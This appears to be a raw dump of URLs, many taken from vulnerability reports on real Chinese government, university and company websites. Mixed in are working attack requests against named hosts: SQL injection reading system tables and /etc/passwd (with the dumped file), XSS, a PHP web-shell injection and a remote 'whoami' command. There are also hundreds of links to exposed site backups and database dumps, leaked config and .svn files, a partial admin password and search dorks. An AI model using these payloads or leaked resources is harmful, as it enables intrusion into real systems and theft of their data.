https://github.com/javaxiaomangren/amap-data-cp/blob/d3924a1765eb1e3d635338962c621fbd60e34223/amap-data-cp-theater/src/main/resources/matrix.properties https://github.com/yindashan/nagios/blob/c4989cd5b9293cb3618021833f01270b3f5c066c/plugin/notify_mail.py http://www.ezzw.gov.cn/sgo/index.action http://yx.jxnu.edu.cn/cms/view/lm.action?id=108 http://222.26.127.247/esource/getdb.php?id=10 http://lnyesx.lnu.edu.cn/ http://58.154.60.152/ http://www.syaqpx.com/ http://58.154.60.152/3gcms/ http://58.154.60.152/3gcms/admin.php?s=/Public/login http://58.154.60.152/3gcms/jing.php http://dg.gdrsks.gov.cn/show.asp?id=956 http://www.ybjg.gov.cn:8088/zxtg/edit.asp?id=1017 http://zhuanti.ahedu.gov.cn/lf/show.asp?id=81 http://www.hljboli.gov.cn/mome.asp?id=1 http://www.yclynk.gov.cn/scenic_show.asp?id=11 http://www.cdngo.gov.cn/articleread.asp?id=843 http://riem.swufe.edu.cn/riem/info.asp?id=67 http://www.cms.zju.edu.cn/news.asp?id=954 http://riem.swufe.edu.cn/en/info.asp?id=16 http://jpkc.hrbmu.edu.cn/jpkc.asp?id=194 http://czx.xmu.edu.cn/user/cdnews.asp?id=6507 http://cmse.sdust.edu.cn/shiziinfo.asp?id=245 http://gdmj.org.cn http://user.517na.com 
http://passport.baihe.com/login.jsp http://profile.baihe.com/login.jsp?userId=53686963&page=basicInfo.jsp http://mail.jiangxia.gov.cn/create.asp http://210.75.218.111/bh/accounts/login.html https://sfglxuzhou.nacao.org.cn/publish/501/index.html http://bi18n.linekong.com/etoolkitsweb/login.do?method=getLianyunGameByName&passportName=hacker%27%20UNION%20ALL%20SELECT%20NULL,OWNER,NULL%20FROM%20%28SELECT%20DISTINCT%28OWNER%29%20FROM%20SYS.ALL_TABLES%29-- http://www.jsczmm.gov.cn/ http://mall.kingdee.com/cart.action http://mall.kingdee.com/search.action?k=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E http://www.goldpartner.com.cn:8080/contact.php?provinceid=2 www.phpstudy.net http://www.redapplenet.com/case.html http://pingtai.885hr.com/pageurl.php?url=25842 http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=hack%E6%B5%85%E8%93%9D&userID=2049405&template_id=&domain=baozou http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=用户名&userID=用户ID&template_id=&domain=baozou http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=hack%E6%B5%85%E8%93%9D&userID=2049405&template_id=&domain=baozou http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=wooyunxxx&userID=8311358&template_id=&domain=baozou http://baozou.com/users/124604/articles ID:124604 http://yun.baozoumanhua.com/Project/baozoumanhuaMaker/makerv29.swf?username=王尼玛&userID=124604&template_id=&domain=baozou http://www.marutora.com.tw/class_post_container.php?cid=12页面存在注入漏洞,可以得到大量会员信息,和管理员账号。 http://user.517na.com/FindPassword/forgotPwd http://uem.3songshu.com/ http://market.sj.91.com/default.aspx http://resmgt.sj.91.com//Upload/Theme/2015/01/31/6128548343834f4aa074f57a512eaa7b.aspx http://t.damai.cn/search/maitiansearchaction.do?_action=searchMaitian inurl:CaseView.aspx?did= http://www.yniso9001.net/CaseView.aspx?did=133 http://www.sqlmap.org www.yniso9 http://www.swsresearch.com/cn/pop_xxpl_note.aspx?ContentId=1622 
http://www.lzbxxx.com/lzbxxx.rar http://www.mdweekly.com.cn/1.rar http://www.ms-accp.com/ms-accp.zip http://www.2ds.cn/2ds.rar http://teatreexy.com/teatreexy.zip http://whicu.com.cn/1.zip http://www.xuefu5.com/xuefu5.sql http://www.yunjihua.biz/yunjihua.sql http://www.ltpower.net/web.zip http://www.gxdedu.net/1.zip http://www.teatreexy.com/teatreexy.zip http://www.bjcpjx.net/admin.rar http://www.xxcs.com.cn/xxcs.zip http://www.ahiec.net/www.rar http://www.sxitu.com/1.rar http://www.makeup.net.cn/web.rar http://www.ruclaw.com/ruclaw.com.zip http://www.gdidi.cn/gdidi.sql http://210.26.24.9/1.rar http://www.tsnc.edu.cn http://www.gysdyzx.com/1.rar http://www.yc14z.com/admin.rar http://www.qiangdingdi.com/qiangdingdi.sql http://www.hebija.com/1.rar http://www.txpx.com/flashfxp.rar http://www.dh2z.com/dh2z.sql http://www.zbtdr.com/zbtdr.com.rar http://www.duen-edu.cn/duen-edu.rar http://www.ziaedu.cn/web.rar http://www.gdhjss.com/data.rar http://www.gysdyzx.com/1.rar http://www.xuebaotougao.com/data.rar http://www.zgkyedu.com/zgkyedu.sql http://www.khantong.com/khantong.sql http://www.shgdwz.com/web.rar http://www.smartscope.com.cn/smartscope.sql http://www.qiangdingdi.com/qiangdingdi.sql http://www.ea96.com/www.rar http://www.ykw18.com/1.rar http://www.0563f.com/web.rar www.0563f.com http://www.bcyz.cn/bbs.rar http://www.0513kuaiji.com/0513kuaiji.rar http://www.0539peixun.com/123.rar http://www.369xxw.com/wwwroot.rar http://bbs.3kid.com/bbs.zip http://bbs.3kid.com/bbs.zip http://bbs.3kid.com/bbs.zip http://www.qdjj.net/qdjj.rar http://www.sjmzzy.com/wwwroot.rar http://www.edu-job.org/1.tar.gz http://www.sjmzzy.com/wwwroot.rar http://www.medbaike.com/web.zip http://www.arft.net/1.rar http://www.ybkjj.com/a.rar http://www.ruczy.cn/bbs.rar http://www.mofangge.com/1.rar http://www.ltpower.net/ltpower.net.zip http://www.longwencd.com/wwwroot.rar http://www.zjoubbs.com/zjoubbs.zip http://www.stabbs.net/stabbs.zip http://www.hlcp.com.cn/1.rar http://www.hwtiyu.com/bbs.rar 
http://www.peizheng.cn/123.zip http://www.zhuoyouba.net/1.zip http://www.zw51.cn/zw51.rar http://www.gzdxs.com/gzdxs.sql http://www.xmude.com/xmude.com.zip http://dongfangyingyu.com/wwwroot.zip http://www.tamron.com.cn/tamron.rar http://www.peoplehospital.com/peoplehospital.com.rar http://www.xjc100.com/xjc100.com.zip http://www.sascc-cnu.org/wwwroot.rar http://www.gx211.com/back.rar http://www.hpms.cn/hpmscn.rar http://www.jyfy.com.cn/1.rar http://www.njustjx.cn/njustjx.rar http://www.hbswhzx.com/www.rar http://prepedu.cn/web.rar http://www.qzyzb.com/qzyzb.rar http://www.scaes.cn/wwwroot.rar http://www.cjdgedu.com/web.rar http://bjtzhxps.com/1.zip http://www.njoc.cn/wwwroot.rar http://www.zz3z.net.cn/web.rar http://202.201.208.4/web.rar http://jhdx.cn/web.zip http://www.xinyushang.com/www.rar http://bbs.jianxun.net.cn/bbs.rar http://www.hustbbs.com/hustbbs.rar http://bbs.qsgct999.cn/bbs.qsgct999.cn.rar http://bbs.bnet.com.cn/1.tar.gz http://www.shidalu.cn/shidalu.zip http://www.infodawn.org/1.zip http://www.hsjwhw.org/1.zip http://www.yysx-edu.com/1.zip http://www.scjqwcb.com/scjqwcb.rar http://www.cjkj-edu.cn/1.zip http://www.yysx-edu.com/1.zip http://www.aierxin.com/www.aierxin.com.zip http://www.edushuren.com/edushuren.rar http://www.wzjjxtd.com/wzjjxtd.rar http://www.longwencd.com/wwwroot.rar http://qdjj.net/qdjj.rar http://www.jhwzjj.com/jhwzjj.rar http://www.0632jjw.com/wwwroot.rar http://www.youdijy.com/www.youdijy.com.zip http://www.nanjingjiajiaowang.com/wwwroot.rar http://www.qd-jj.cn/qd-jj.rar http://www.0351jiajiao.cn/0351jiajiao.rar http://www.jj537.com/jj537.rar http://www.huashick.com/huashick.rar http://www.yhszjj.cn/yhszjj.rar http://www.jnjcedu.com/jnjcedu.com.rar http://**.**.**/2014_5/get.phpurl=ssss%27&get=esxd http://**.**.**/index.phpm=Public&a=login http://www.verycd.com/,看到登陆的地方没有验证码限制 http://www.yunhotel.net/login.action http://58.42.251.211/seeyon/index.jsp http://api.op.cig.com.cn/ http://www.sdggww.com/show_news.php?id=158 content:just 
http://www.lvmama.com/uploads/header/3428a92f4b3ad5fb014b41151e090091.txt http://www.cq.gov.cn:80/ www.cq.gov.cn username:admin password:123*** http://per.damai.cn/1.rar http://bbs.xunbao.amap.com/ http://www.strongsoft.net/ http://yunpan.cn/cKRgUWxIz5547 http://www.youcansong.com/index.php/Admin_OrderDetail_oId_2807 http://www.swjtu.com/0.zip http://www.wsxx120.com/web.rar http://www.lyjsxy.net/lyjsxy.tar.gz http://www.zhongmeijy.com/zhongmeijycom.sql http://www.med66.com/med66.tar.gz http://www.bdqnzongbu.com/bdqnzongbu.sql http://www.chinaoptic.com.cn/flashfxp.rar http://www.hebut.com/hebut.com.rar http://www.zhiyexx.com/web.rar http://www.huishangpx.com/1.zip http://www.qdschool.net/qdschool.net.rar http://www.ielts.ws/web.rar http://www.phppx.com/a.rar http://hnjc.org/hnjcorg.rar www.hnjc.org/www.hnjc.edu.cn http://www.qiyicc.com/a.rar http://www.zhiyexx.com/web.rar http://www.yesfxx.com/web.rar http://www.hydyzx.cn/web.rar http://www.yesfxy.com/web.rar http://www.yesfxx.com/web.rar http://www.ynftc.cn/admin.rar http://www.lwyzzx.cn/flashfxp.rar http://www.wushu163.com/data.rar http://www.scmyns.com/新建文件夹.rar http://www.peizheng.cn/1.rar http://fjydsf.com/wwwroot.rar http://www.zzyz.com.cn/新建文件夹.rar http://csti.cn/csti.rar http://202.117.35.250/admin.rar http://www.zzyz.com.cn/新建文件夹.rar http://csti.cn/csti.rar http://www.jsslssyxx.com/jsslssyxx.com.rar http://crtvu.cn/root.rar http://www.smlxxx.com/smlxxx.com.rar http://crtvu.cn/root.rar http://www.sdmyxy.cn/1.zip http://www.xmald.com/xmald.com.rar http://www.jsslssyxx.com/jsslssyxx.com.rar http://www.sdmyxy.cn/1.zip http://www.xqhospital.com.cn/1.rar http://www.ihs.ac.cn/bbs.rar http://www.nibs.ac.cn/nibs.sql http://www.ybwsxx.cn/www.rar http://szjcez.com/1.rar http://www.njnuyz.com/wwwroot.rar http://www.glsgy.org/www.zip http://218.57.132.2/1.rar http://www.sduzszx.com/1.rar http://www.jidiying.net/bbs.rar http://www.bjslmfls.com/bjslmfls.com.rar http://www.hssyalxx.com/hssyalxx.zip http://www.hkfc.cn/1.rar 
http://hkfc.cn/1.rar http://www.qdycjy.cn/qdycjy.rar http://www.dsqdxscyy.cn/data.rar http://www.jyvtc.com/1.rar http://whdxzcb.com/123.zip http://zzzxtjyw.com/123.zip http://www.gxzyjs.com/wwwroot.rar http://www.ddfcq.com/wwwroot.rar http://www.hrpku.cn/hrpku.rar http://www.mehfptm.com/mehfptm.com.rar http://www.gdhywx.com/www.rar http://www.enxxw.com/enxxw.zip http://www.sccdlg.com/sccdlg.rar http://www.xihuadaxue.com/xihuadaxue.rar http://www.stuln.com/123.zip http://www.pmpsjtu.com/wwwroot.zip http://www.tjkdzk.com/123.zip http://www.sjxxedu.com/1.rar http://www.znxsw.com/znxsw.zip http://weikebiao.com/web.rar http://dqzyxy.net/1.rar http://www.cacms.ac.cn/1.zip http://www.cacms.ac.cn/1.zip http://www.dqzyxy.net/1.rar http://www.jsycms.com/jsycms.rar http://www.shxkxy.com/www.rar http://www.slqsyxx.com/www.slqsyxx.com.rar http://www.lgzkck.com/1.zip http://www.cutka.cn/cutka.rar http://www.0685.com/a.rar http://www.17tto.com/wwwroot.zip http://lknczx.com/lknczx.com.rar http://www.ywzk.com/www.rar http://www.xinruiyishu.com/xinruiyishu.rar http://www.hnjn.net/data.rar http://www.xuwenyz.com/xuwenyz.zip http://bbs.jnlts.com/wwwroot.rar http://www.xasy.org/bak.rar http://lubanu.com/lubanu.sql http://www.jksx.net/1.rar http://www.hrbkjzy.cn/website.rar http://www.yaopin114.com/yaopin114.zip http://www.huashick.com/huashick.rar http://www.jsxxojxq.com/wwwroot.rar http://www.wanxue.cn/wanxue.zip http://shandongcaijing.com/beifen.zip http://www.0592xy.com/wwwroot.rar http://www.fetv.cn/www.rar http://baozoumanhua.com/users/8311358 http://baozoumanhua.com/users/用户id http://app.fashion.ifeng.com/luxury/ajax_grade.php?product=64&number= http://www.4006126780.com/admin/user_dao_excel_save.asp?id=1 http://land.huizhou.gov.cn/WorkOnLine/loginAction.action http://www.rd.sdu.edu.cn/newsDetail?sno=news1422238689967 http://hnass.com.cn http://huodong2.4399.com/comm/invitewap/share.php?cu=568443&u=945928751&from=singlemessage&token=04dd20&id=406&ext=&isappinstalled=1 
http://www.gzfhw.gov.cn/ http://www.bjtennis.com/index.php?id= http://www.bjtennis.com/index.php?id=%3C?php%20phpinfo%28%29;?%3E http://www.bjtennis.com/index.php?id=%3C?php%20eval%28$_POST%5Bxiao%5D%29?%3E http://chailv.feiren.com/tempus/ http://www.webcet.cn:8080/index.aspx http://www.webcet.cn:8080/index.aspx http://www.cer.com.cn/ http://contents.cer.com.cn/MyResource/FileUpload http://baozouribao.com/user/baozou_login http://125.62.63.127:8089/OTNM2000_ch/ http://kx.2windao.cn:9000/user/loginAction.action/toLoginAction.action?department=jsskx site:nbsw.yundasys.com http://nbsw.yundasys.com:11324/newcar/print/index.php?fcpz=31001570481&rq=2014-09-19 http://112.124.56.216:8080/Super/EmptyClassroom/findEmptyClass.action http://my.39.net/passport/Login.aspx?usertype=1®auto=1&backurl=http://www.39.net/?Success=1&Info=%B5%C7%C2%BC%B3%C9%B9%A6&Data=04bFbILI1%2ftU5WGsdeAWG52fUfyKbCoheBNY2dSNg1QzQbD1Ak79YvEjxjCQ6fgHHtnW4Kd4hSj3GUo2zonDgRw7QU9kos1NzAFiNPcILqK0LSy97fqE9EROgnTFs1PmGQZShxLwc7I%3d&Success=1&Info=%B5%C7%C2%BC%B3%C9%B9%A6&Data=04bFbILI1%2ftFkIdMgUcl%2by7MepqJcLelrpBwDYN22a0aI00iCt19XvqTKOkydcqHqPVvFjtcKdVQ1179v3YhKSn2LyfT7VQfxQge2qbdatFNWztKD7g8Lyem4dRxG3YsumbV4iqC415U7bKb0WQE7g%3d%3d&Success=1&Info=%B5%C7%C2%BC%B3%C9%B9%A6&Data=04bFbILI1%2fs2Aok0tNjLwKmXO98Ai7mAs2CAhgUvPA9VXJgVuxKANbGVZoVXPO49lm1dUB3LDiq0npUFmAI7BuEJb0mI3XrHqZzhqIC7twvEAeuTphyi4e8D%2fY1XYOk8T98jKunLVdkX4r51DbJEOQ%3d%3d http://data.bd.baofeng.com/admin/ http://150.255.30.111:8080/ http://222.35.41.77:8181/ http://58.18.131.8/ http://mxfor.com/ http://218.8.130.130:8080/ http://112.65.19.2:8080/ http://www.ynnk.com.cn/detail_content.action www.phsciencedata.cn/Share/wiki/wikiView?id=39e3730e-6861-478a-b88d-3d11d291bea2 http://service.haier.net:8086/defective_products/business_processing.jsp http://service.haier.net:8086/defective_products/checkno.jsp?prono=1 inurl:/pmember.asp http://www.dlcxdrc.com/person/mailbox.asp?del= http://www.cxdrc.com/person/mailbox.asp?del= 
http://www.lncyrc.com.cn/person/mailbox.asp?del= http://www.lnbprsrc.com/person/mailbox.asp?del= http://www.fxrsw.cn/rencai/person/mailbox.asp?del= http://www.jobch263.com/person/mailbox.asp?del= http://site.czxh.gov.cn/job/person/mailbox.asp?del= http://www.lsqjy.cn/lsqjy/person/mailbox.asp?del= http://www.mlqgwyj.com/person/mailbox.asp?del= http://www.127mc.com/person/mailbox.asp?del= http://job0514.com/person/mailbox.asp?del= http://jianzhuzhuangshirc.97197.com/person/mailbox.asp?del= http://www.shtongda.com/person/mailbox.asp?del= http://www.yczjw.cn/person/mailbox.asp?del= http://mojurencai.48448.com/person/mailbox.asp?del= http://www.0857zp.com/person/mailbox.asp?del= http://wangluorencaiwang.99292.com/person/mailbox.asp?del= http://112.124.28.12/person/mailbox.asp?del= http://www.120hr.cn/person/mailbox.asp?del= http://222.73.250.58 http://www.gsszczx.com/W/HdContentDisp-3-287-20141021-489201.htm http://www.gsszczx.com/www/HdUserLogin.asp http://61.178.20.106/wsbm/webRegister/index.aspx http://106.3.34.89:10010/ http://106.3.34.89/index.php?list-popularity-1 http://180.153.27.10:8080/content/CSV/ http://122.200.87.152/phpMyAdmin-2.11.11.3-all-languages/ http://passport.china.com/登陆通行证网站的数据库配置信息。 http://everysync.lenovo.com.cn:8098/ http://passport.mapabc.com/ http://passport.mapabc.com/usermanage/servlet/KeyServlet?action=get_ifom_of_user&date=&name=用户名 http://www.iprcc.org.cn/back/article/catalog.action?currentLang=en http://www.iprcc.org.cn/back/article/catalog.action?currentLang=zh http://113.31.28.21:3000/news http://boss.mapabc.com/ http://check.biz.icms.ifeng.com/admin/resource/images/05.gif/.php http://biz.icms.ifeng.com/resource/images/login_submit.jpg/.php http://bjwifi.p.ifeng.com/index.php?s=/Home/Wifi/login.html http://210.51.28.16:9101/ http://210.51.28.16:9105/ www.bdcgs.com http://222.66.139.5/comm/getDownload?segmentPath=WEB-INF/web.xml http://222.66.139.5/comm/getDownload?segmentPath=WEB-INF/struts-config.xml 
http://118.194.40.134:8080/index.php?m=Index&a=index http://118.194.40.135:8080/index.php?m=Index&a=index http://118.194.40.29/config.inc.php http://play.wawayaya.net/G_PwdSecurity2.asp?sysQuestion=1&owneranswer=aaaa&userid=用户ID&submit.x=44&submit.y=18 http://aiworks.cn/index.php/form/newsread/name/aboutus.html http://rtb.bitsmart.com.cn/ http://rtb.bitsmart.com.cn/account.php?method=editAccount&id=81%20and%202=3%20union%20select%201,2,load_file%28%27/etc/passwd%27%29,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:156:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin 
zabbix:x:501:501::/home/zabbix:/sbin/nologin www:x:502:502::/home/www:/bin/bash vsftpuser:x:503:502::/data/wwwroot:/sbin/nologin http://m.fangdd.com/suzhou/house/loupan/pats-list?house_id=246 http://m.fangdd.com/suzhou/house/loupan/pats-detail?pats_id=3746 url:http://61.183.132.221/login/nds/login.jsp http://61.183.132.221/login/nds/ http://61.183.132.221/login/nds/loginone.jsp.20090811,loginone.jsp.20090811文件存在登录用户名、密码泄露 http://58.83.217.86/.svn/entries http://www10.53kf.com/zdy_dbgg2.php?style_id=106098168&company_id=72067196&dbgg_type=2 http://boss.mapabc.com http://boss.mapabc.com/getUserAndEnterpirsInfo.action?returnArray=YES&name=用户名 http://boss.mapabc.com/getUserAndEnterpirsInfo.action?returnArray=YES&uuid=用户id http://mkszyxy.bjtu.edu.cn/showNews?news.id=63 http://skleh.pumc.edu.cn/show.php?contentid=251 http://kf2.coolpad.cn/zdy_dbgg2.php?style_id=103608619&company_id=70722519&dbgg_type=2 http://youxuan.homeinns.com/Address/EditAddress/19001?FromType=1 http://autodata.jinghua.cn/index.php?r=SellerPrice/Price&type=prdprice&prdid=38220&id=172%27&pid=1 http://www.phpmps.com/demo/postcom.php http://kf1.coolpad.cn/zdy_dbgg2.php?style_id=103608619&company_id=70722519&dbgg_type=2 http://srm.mindray.com/login/index.action http://njsrm.mindray.com/login/index.action ip:10.1.1.243 http://tdp.mindray.com/logon/logon.action http://intlservice.mindray.com/logon/index.action ip:10.1.2.198 http://cas.mindray.com/logon/index.action http://pm.goodaysh.com/redmine/projects http://www.zjwz12380.gov.cn/fgzd.action存在struts2漏洞S2-016,可执行远程命令,为管理员权限,也可上传任意文件,根据http://www.zjwz12380.gov.cn/k8cmd.jsp显示的内容,且远程命令查询到主机3389端口开放,目测已经被日,因为是gov站点,所有不做深入渗透,请自行更新补丁和清楚网马。下面直接上图不做过多解释。 http://59.151.113.225/WEB-INF/web.xml http://59.151.113.225/WEB-INF/spring/webmvc-config.xml http://www.xcxpyh.com/xcxpyh.com.rar http://reports.goodaysh.com/login.action jdbc:hsqldb:hsql://127.0.0.1:9001/openreports http://a1836715.sn1697.gzonet.com/master_content.php?id=473 
http://www.wandafilm.com/wanda/news.do?m=getNewByNewId&newsId=20150126093724078641 http://game.qq.com/js/content_admin/activity_center/CDKYE_INFO_XXXX.js http://bbs.habb.cn/utility/convert/data/config.inc.php http://product.jiu.163.com/app/user/outerLogin.html?userId=[用户ID http://product.jiu.163.com/app/user/outerLogin.html?userId=dwssto@163.com1 http://product.jiu.163.com/app/user/outerLogin.html?userId=peterpan1028001@126.com1 http://minisite.youku.com/engnice/ https://openapi.youku.com/v2/players/custom.json?client_id=e60598a400fcc86b&video_id=XODgzNzE4NjE2&embsig=undefined&refer=http%3A//minisite.youku.com/engnice/index.php&callback=partnerinfo.parse wz.easou.com/coln.e?esid=U4xDHpoG85s&tk=com_about4&wver=t wz.easou.com/sdp.e?esid=sZiDHOa2iMa&ps=97&wver=t http://api.mix.guohead.com/stats_app_activity.php?spid=a85a279e38364d17&client=1&gh_ver=2.0.5&app_pkg=com.ejiuwu.qpbuyu&app_ver=3.2.2&mac=020000000000&open_udid=8ec4d374f19ec87dfd632d448e6e30e42616c9f8&pmodel=iPhone7,2&wifi=1&adid=B494BDA4-C71A-44F9-A858-AC2891C230E4&is_ad_track_enabled=1&vendor_id=F469C05D-BC41-481B-ABB1-8B330ACB180B&width=568.000000&height=320.000000&os_lang=zh_CN&os_ver=8.1.2&jailbreak=1&app_dev_fml=1,2&a1=misd&a2=assertiond&a3=discoveryd&a4=fairplayd.H2&a5=cfprefsd&a6=seld&a7=discoveryd_helpe&a8=passd&a9=biometrickitd&a10=nfcd&a11=searchd&a12=nsurlsessiond&a13=InCallService&a14=bird&a15=MobileSMS&a16=ReportCrash&a17=cloudphotod&a18=cloudd&a19=coreduetd&a20=assistant_servic&a21=nsurlstoraged&a22=pkd&a23=QQ&a24=coreauthd&a25=DuetHeuristic-BM&a26=WirelessRadioMan&a27=awdd&a28=CoreAuthUI&a29=lsuseractivityd&a30=MicroMessenger&a31=rtcreportingd&a32=coresymbolicatio&a33=diagnosticd&a34=com.apple.sbd&a35=absd&a36=misagent&a37=pipelined&a38=IMDPersistenceAg&a39=CacheDeleteDaily&a40=com.apple.lakitu&a41=vvebo&a42=%C3%82%C3%A7%C3%89%C3%81%C3%87%C3%86%C3%8A%C3%A7%C3%AF%C3%88%C2%B1%C2%BA&a43=Preferences&a44=nehelper&a45=MobileSafari&a46=com.apple.WebKit&a47=com.apple.WebKit&a48=qpbuyu&a49=gamecontrolle
rd&a50=ReportCrash&a51=xpcproxy&initial=1 http://www.guohead.com/admin/login http://sfz.8684.cn/.svn/text-base/public.php.svn-base http://sfz.8684.cn/.svn/text-base/index.php.svn-base http://huoche.8684.cn/sftp-config.json http://www.wandafilm.com/active/bqqp/.svn/entries http://www.wandafilm.com/ads/.svn/entries http://www.wandafilm.com/ads/D/.svn/entries http://www.wandafilm.com/ads/G/.svn/entries http://www.wandafilm.com/imges/movie/ads/.svn/entries http://211.136.104.84:8080/webadmin/doLogin http://www.jdsry.com/website/wzdc_info.asp?id=13%27 url:http://222.221.16.199:8080/PointManageSystem/login.action http://www.fescoservice.com//manager/index.php http://bbs.gv028.com//utility/convert/data/config.inc.php http://www.ot-hs.com/index1.asp http://hbjtzdgc.com/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://bbs.chexun.com/shop_info.php?info=51 http://60.31.186.42:800/sgo/index.action http://192.168.1.5:8000/WebService/CaseService.asmx?wsdl http://www.hzairport.com http://jipiao.hzairport.com http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx http://60.191.78.34/UserCenter/orderManage/AddBackChange.aspx http://sqlmap.org http://www.ly.com/youlun/CruiseTours/CruiseToursAjax.aspx?Type=GetToursLineContent&iid=0.7168335842458044&lineid=70855的lineid参数存在SQL盲注 http://serv.391hui.com/-站点存在Struts执行漏洞 http://www.htj2778198fwzx.cn/ArticleDetail.aspx?ArticleID=00000000000000000223 http://personal.nsdc.cn/ http://58.23.129.230:8168/xmweb/ http://member-sh.asfashion.net:9090/ http://member-sh.asfashion.net:9090/1.jsp http://42.96.144.248:7000/Learning/Login.action http://60.12.137.82/站点存在Struts2安全漏洞 http://onair.cdvcloud.com/user/toRegisterInfo/ http://onair.cdvcloud.com https://mg.damai.cn/xplatform/login.do http://www.socio-legal.sjtu.edu.cn/存在SQL注射,越权等问题 http://**.**.** 
http://vip.cutc.com.cn/jcms/interface/user/out_userinfo.jsp?xmlinfo=%3Cmain%3E%3Cstatus%3EQ%3C/status%3E%3C/main%3E http://mail.ca.suzhou.gov.cn/extmail/cgi/index.cgi http://blog.10jqka.com.cn/215824896/ http://king1.homevv.com/go/storeShow.action http://116.228.55.129:8081/axis2/services/AxisShell/execCmd?cmd=whoami http://buy.ccb.com/member/ssoauth.jhtml?adv_id=zzlb01&ext_origin=CCBCOM&adv_url=http://qq.com/ http://www.xxx.net/uploadface.asp http://www.szgtj.net//UploadFaceOK.asp http://www.szgtj.net//uploadfile/face/20151310571812.asp;jpg inurl:E_ReadNews.asp?NewsId= inurl:E_SmallClass.asp?E_typeid=17 inurl:E_ReadNews.asp?NewsID= http://www.lnjc.gov.cn/ http://www.nyzz.gov.cn/ http://wush.cq.gov.cn/ http://www.hnkfb.gov.cn/ http://www.rzjs.gov.cn/ http://www.pcjs.gov.cn/ http://www.gxhz.gov.cn/ http://www.hrbgz.com.cn/ http://www.jntj.gov.cn/ http://www.tdedu.net/ http://www.hnswsxx.com/ http://www.xtsaudit.gov.cn/ http://www.byfy.gov.cn/ http://www.kfrs.gov.cn/ http://www.pccz.gov.cn/ http://www.cxqi.gov.cn/ http://www.tztjb.com/ http://www.usl.edu.cn/ http://lwlc.smesd.gov.cn/ http://www.sdytyz.cn/ http://www.fanshui.gov.cn/ http://www.37.gov.cn/ http://www.qxncw.com/ http://www.aksrsj.gov.cn/ http://www.tczjw.gov.cn/ http://www.szqjyj.com/ http://www.hbnz.gov.cn/ http://www.jyjyw.net/ http://www.fangshan.gov.cn/ http://www.zgycrs.com.cn/ http://www.slzz.com.cn/ http://www.hslx.org.cn/ http://www.npwj.gov.cn/ http://www.sd-jnyz.com/ http://www.gyxw.com/ http://www.dqzzez.com.cn/ http://www.aqmj.org.cn/ http://www.zhuxi.gov.cn/ http://www.czhzwh.com/ http://www.nzdj.org.cn/ http://www.tzgghb.gov.cn/ http://www.sxtsw.org/ http://www.fscyyy.com/ http://www.hzsagri.gov.cn/ http://www.hbgdfy.com/ http://www.cn-tm.com/ http://yc.sxga.gov.cn/ http://www.bahuzx.cn/ http://fpb.zhuxi.gov.cn/ http://www.0722edu.com/ http://www.economiclaws.net/ http://www.lyxabd.com/ http://www.lsedu.cn/ http://dhdszx.edudh.net/ http://jwc.sdflc.com/ http://www.jdxrdcwh.gov.cn/ 
http://www.jszx.zj.cn/ http://www.fdyz.net/ http://hdgt.hd.gov.cn/ http://www.liubao.gov.cn/ http://www.szgsj.gov.cn/ http://cf.cjj-bucg.com.cn/ http://www.fjxlnxx.com/ http://zxs.hdcz.gov.cn/ http://hdzx.jdjy.cn/ http://www.fjqgx.com/ http://www.changpu.gov.cn/ http://www.jldledu.com/ http://www.hbszjs.com/ http://wh-aic.gov.cn/ http://www.aqzfj.gov.cn/ http://www.hbyxdx.com/ http://www.ykcl.org/ http://www.cdwx.cn/ http://www.sz-lanhai.com/ http://www.lygrd.gov.cn/ http://www.mctw54.org/ http://hebhdxgt.gov.cn/ http://dy.yzjy.com.cn/ http://www.xa43zx.com/ http://www.sxyqwater.gov.cn/ http://www.keqiao.gov.cn/ http://www.gyzyefy.com/ http://www.gxpg.gov.cn/ http://zf15.wygk.cn/ http://wush.cq.gov.cn/ http://www.aksrsj.gov.cn/ http://www.zgycrs.com.cn/ http://www.oa.hbnu.edu.cn/ksoa/login.jsp http://www.nongyou.com.cn/ http://61.133.119.187:8091/newSymSum/ConfereeTownSum.aspx?tname=%E7%99%BD%E4%BA%91%E6%B9%96%E9%95%87&CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 